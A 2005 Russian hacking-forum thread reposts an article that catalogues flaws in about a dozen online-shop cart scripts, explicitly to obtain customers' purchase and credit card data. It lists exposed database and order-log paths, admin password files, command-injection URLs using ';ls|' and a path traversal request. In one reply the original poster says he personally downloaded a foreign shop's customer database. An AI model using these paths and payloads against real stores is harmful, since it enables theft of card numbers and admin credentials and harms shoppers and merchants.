Статьи Уязвимости онлайн магазинов

Discussion in 'Статьи' started by k00p3r, 9 Jun 2005.

  1. k00p3r

    k00p3r Banned

    Joined:
    31 May 2005
    Messages:
    430
    Likes Received:
    8
    Reputations:
    2
    Уязвимости онлайн магазинов

    В этой статье я расскажу о нескольких уязвимых корзинах и способах, используя которые, можно получить инфу о покупках и соответственно кредитных картах.

    Начнем...

    Первым номером у нас идет корзинка под названием SalesCart (www.salescart.com)
    Обладает приятной особенностью 8) Удаленный зарегистрированный пользователь может получить доступ к персональным данным других пользователей (типа номеров кредитных карточек =). Эта информация хранится в файле shop.mdb, который доступен любому пользователю.

    ClickCartPro
    Законченное решение для электронных магазинов. Система позволяет управлять складом, отслеживать заказы, управлять показом баннеров и делать многое-многое другое. В стандартной конфигурации программа хранит базы данных открытыми на сервере.

    http://www.server.com/data/site/admin_user.db
    http://www.server.com/cp/data/site/admin_user.db
    http://www.server.com/data/cp/site/admin_user.db

    База admin_user содержит пароли администраторов сайта. =)

    MetaLinks MetaCart2.sql
    Система покупок, основанная на ASP + MS SQL. Уязвимость в программе позволяет атакующему получить доступ к базе данных.

    http://www.server.com/database/metacart.mdbhttp://www.server.com/metacart/database/metacart.mdb

    WebDiscount eShop
    Позволяет исполнять команды.
    http://www.server.com/cgi-bin/eshop.pl?seite=;ls|

    Shopping Cart
    Позволяет исполнять команды.
    http://www.server.com/cgi-local/shop.pl/page=;ls|

    QuikStore
    Удобное решение для совершения покупок с помощью интернет карточек. Уязвимость в программе позволяет получить доступ к файлам сервера.

    http://www.server.com/cgi-bin/quikstore.cgi?page=../quikstore.cgihtml&cart_id=
    Конфигурация хранится в файле: quikstore.cfg

    Order Form v1.2
    Открытая для просмотра директория : /Orders/ , order/ , /orders/ , etc...
    Открытая информация о заказах: order_log_v12.dat (иногда order_log.dat)

    Seaside Enterprises EZMall 2000
    Исполняемый файл: mall2000.cgi
    Открытая для просмотра директория: /mall_log_files/
    Открытая информация о заказах: order.log

    PDGSoft's PDG Shopping Cart 1.5
    Исполняемый файл: shopper.cgi
    Открытая для просмотра директория: /PDG_Cart/
    Открытая информация о заказах: order.log
    Конфигурация хранится в файле: shopper.conf

    Mercantec's SoftCart
    Исполняемый файл: SoftCart.exe
    Открытая для просмотра директория: /orders/ и /pw/
    Открытая информация о заказах: /orders/*.olf
    Конфигурация хранится в файле: /pw/storemgr.pw

    Perlshop
    Исполняемый файл: SoftCart.exe
    Открытая для просмотра директория: /store/customers/ и /store/temp_customers/
    Открытая информация о заказах: Файлы с цифровыми именами (8 знаков)

    WebShop
    Исполняемый файл: WebShop.cgi
    Открытая информация о заказах: /WebShop/templates/cc.txt и /WebShop/logs/cc.txt

    И вот буквально только что , пока я тут писал о корзинках, мой батник скачал свежую порцию багтрэка и там... Ышо одна дырявая корзинка =)

    Alan Ward's A-Cart
    (http://www.alanward.net/acart/) - система осуществления покупок через Web, разработанная в ASP для Windows систем.
    Файл базы данных acart2_0.mdb хранится в Web директории и доступен для загрузки удаленным пользователям. В файле содержится регистрационная информация пользователей совершивших покупку (Имя, адрес, номера кредитных карт).

    Ну вот для первого раза хватит =)


    Автор: 1dt.w0lf
     
  2. Rebz

    Rebz Banned

    Joined:
    8 Nov 2004
    Messages:
    4,052
    Likes Received:
    1,534
    Reputations:
    1,128
    Я считаю, что это уже старые уязвимости или уже давно прикрытые.. вот и в паблике лежат. =)
     
  3. GreenBear

    GreenBear наркоман с медалью

    Joined:
    7 May 2005
    Messages:
    2,547
    Likes Received:
    1,398
    Reputations:
    612
    для общего развития пойдет -)
     
  4. k00p3r

    k00p3r Banned

    Joined:
    31 May 2005
    Messages:
    430
    Likes Received:
    8
    Reputations:
    2
    Нет...сам лично скачал с какогото буржуйского сайта их базу шопа...кажись вот этот скрипт магаза - MetaLinks MetaCart